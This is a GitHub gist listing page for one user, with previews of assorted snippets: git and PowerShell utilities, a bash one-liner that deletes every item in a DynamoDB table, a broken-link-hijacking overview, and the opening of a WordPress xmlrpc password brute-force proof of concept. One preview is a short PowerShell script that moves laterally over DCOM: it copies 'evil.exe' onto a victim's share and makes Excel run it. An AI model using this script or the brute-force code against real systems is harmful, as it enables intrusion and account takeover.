This is a gist used in the following blog posts:
Shaun justrandomdev
justrandomdev
/ 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Created
June 19, 2024 11:37
— forked from approovm/00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git checkout master | |
| git pull | |
| git checkout - | |
| git rebase master |
justrandomdev
/ clear dynamodb
Created
November 19, 2019 11:11
bash 1 liner to clear dynamodb item by item. This can be used when you have limited rights to a dynamodb table and cannot just delete it.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IFS=$'\n'; for itm in $(aws dynamodb scan --table-name ops-cp-ue1-vault-data | jq -r '.Items[] | [.Key.S,.Path.S] | join (" ") ' | awk '{ printf "{\"Key\":{\"S\":\"%s\"},\"Path\":{\"S\":\"%1s\"}}\n",$1,$2 }'); do eval aws dynamodb delete-item --table-name ops-cp-ue1-vault-data --key '$itm'; done; unset IFS |
justrandomdev
/ broken_link_hijacking.md
Created
October 9, 2017 09:51
— forked from EdOverflow/broken_link_hijacking.md
This post aims to give you a basic overview of the different issues that could possibly arise if a target links to an expired endpoint.
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link Hijacking comes in two forms, reflected and stored. This issue has been exploited in the wild numerous times, but surprisingly few researchers actively look for broken links in bug bounty programs.
This post aims to give you a basic overview of the different issues that could possibly arise if a target links to an expired endpoint.
justrandomdev
/ foxprow.ps1
Created
September 12, 2017 11:22
— forked from rxwx/foxprow.ps1
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) | |
| # Windows 10 specific, but searches PATH so .. | |
| copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE | |
| $excel.ActivateMicrosoftApp("5") | |
| # excel executes your binary :) |
justrandomdev
/ wp-xmlrpc.csx
Created
February 28, 2017 06:42
Wordpress xmlrpc.php password brute force POC written using c# scripting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Xml.Linq; | |
| using System.Text.RegularExpressions; | |
| public class WpXmlRpc { | |
| private string userFilename = String.Empty; | |
| private string passFilename = String.Empty; |
justrandomdev
/ Clip_to_json.ps1
Created
November 7, 2016 12:11
Powershell get string from clipboard & convert to JSON. Then can be queried as a regular object
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ([windows.forms.clipboard]::GetText() | ConvertFrom-Json) |
justrandomdev
/ iplog.ps1
Created
November 3, 2016 16:33
Powershell log external IP & timestamp every 60s to console. Ctrl + c exits. I used this to determine how often my service provider cycles my ip address
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter timestamp {"$(Get-Date -Format u): $_"} | |
| while(1) { curl http://icanhazip.com | select -ExpandProperty Content | timestamp; sleep(60) } |
justrandomdev
/ fix-homebrew-npm.md
Last active
August 29, 2015 14:26
— forked from DanHerbert/fix-homebrew-npm.md
Instructions on how to fix npm if you've installed Node through Homebrew on Mac OS X or Linuxbrew
If you just want to fix the issue quickly, scroll down to the "solution" section below.
If you're a Homebrew user and you installed node via Homebrew, there is a major philosophical issue with the way Homebrew and NPM work together. If you install node with Homebrew and then try to do npm update npm -g, you may see an error like this:
$ npm update npm -g